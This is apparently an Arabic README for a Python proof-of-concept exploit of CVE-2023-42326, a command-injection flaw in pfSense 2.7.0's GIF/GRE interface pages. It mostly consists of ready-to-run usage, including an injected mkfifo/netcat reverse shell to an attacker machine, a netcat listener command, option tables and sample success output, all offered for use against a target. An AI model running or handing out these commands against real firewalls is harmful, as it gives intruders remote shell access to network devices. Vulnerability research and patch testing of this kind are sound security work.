
هذا هو إثبات مفهوم بسيط لإظهار ثغرة حقن الأوامر في pfSense 2.7 (CVE-2023-42326)
هذا البرنامج النصي بايثون هو إثبات المفهوم (PoC) لاستغلال ثغرة حقن الأوامر (CVE-2023-42326) في pfSense 2.7.0. تسمح هذه الثغرة للمهاجمين الموثقين بحقن وتنفيذ أوامر عشوائية عبر مكونات interfaces_gif_edit.php و interfaces_gre_edit.php.
gif أو gre) لاختيار المكونات المعرضة للخطر.قبل تشغيل البرنامج النصي، تأكد من أن لديك:
pip install requests beautifulsoup4 rich
هذا الأمر يحقن أمر شيل يقوم بإنشاء شيل عكسي إلى جهازك:
python3 exploit.py -u "admin" -p "pfsense" --mode "gif" -t "http://10.101.1.1" -c "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.151.1 80 > /tmp/f &"
-u: اسم المستخدم لتسجيل الدخول كمسؤول pfSense.-p: كلمة المرور لتسجيل الدخول كمسؤول pfSense.--mode: وضع الاستغلال (إما gif أو gre).-t: عنوان URL المستهدف لـ pfSense.-c: أمر الشيل الذي سيتم حقنه.-d: (اختياري) تفعيل وضع التصحيح لرؤية بيانات الاستجابة الخام.تأكد من وجود مستمع Netcat يعمل على جهازك:
nc -lvnp 80
ثم قم بتشغيل البرنامج النصي بأمر شيل عكسي مثل هذا:
python3 exploit.py -u "admin" -p "pfsense" --mode "gif" -t "http://10.101.1.1" -c "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.151.1 80 > /tmp/f &" --insecure(for https without valid ssl)
تسجيل الدخول إلى pfSense واستغلال واجهة GIF

تنفيذ شيل عكسي

| المعامل | الوصف |
|---|---|
-u | اسم المستخدم لتسجيل الدخول كمسؤول pfSense. |
-p | كلمة المرور لتسجيل الدخول كمسؤول pfSense. |
-t | عنوان URL/IP المستهدف لـ pfSense (مثل http://10.101.1.1). |
--mode | وضع الاستغلال: gif (لـ interfaces_gif_edit.php) أو gre. |
-c | الأمر الذي سيتم حقنه في المكون المعرض للخطر. |
-d | اختياري. تفعيل وضع التصحيح لطباعة بيانات الاستجابة للرؤية. |
عندما يتم تشغيل الاستغلال بنجاح، يجب أن ترى إخراجًا مشابهًا لهذا:
██████╗ ███████╗██████╗ ██╗ ██╗███╗ ██╗███╗ ███╗███████╗
██╔══██╗██╔════╝██╔══██╗██║ ██║████╗ ██║████╗ ████║██╔════╝
██████╔╝█████╗ ██████╔╝██║ █╗ ██║██╔██╗ ██║██╔████╔██║█████╗
██╔═══╝ ██╔══╝ ██╔═══╝ ██║███╗██║██║╚██╗██║██║╚██╔╝██║██╔══╝
██║ ██║ ██║ ╚███╔███╔╝██║ ╚████║██║ ╚═╝ ██║███████╗
╚═╝ ╚═╝ ╚═╝ ╚══╝╚══╝ ╚═╝ ╚═══╝╚═╝ ╚═╝╚══════╝
Done with ❤️ by @bl4ckarch
[2024-10-24 03:57:59] [SUCCESS] Target http://10.101.1.1 is reachable
[2024-10-24 03:57:59] [INFO] Fetching CSRF token from: http://10.101.1.1/
[2024-10-24 03:57:59] [SUCCESS] CSRF token extracted successfully
[2024-10-24 03:57:59] [INFO] Sending GIF exploit request to http://10.101.1.1/interfaces_gif_edit.php
[2024-10-24 03:57:59] [SUCCESS] GIF Exploit sent successfully
إذا كنت ترغب في رؤية المزيد من التفاصيل حول الطلبات المرسلة، يمكنك تفعيل وضع التصحيح بإضافة -d إلى أمرك. سيقوم هذا بطباعة بيانات الاستجابة ومساعدتك في استكشاف أي مشكلات.
python3 exploit.py -u "admin" -p 'pfsense' --mode 'gif' -t http://10.101.1.1 -c "your_command_here" -d --insecure(for https without valid ssl)
-d للحصول على تسجيل أكثر تفصيلاً إذا لزم الأمر.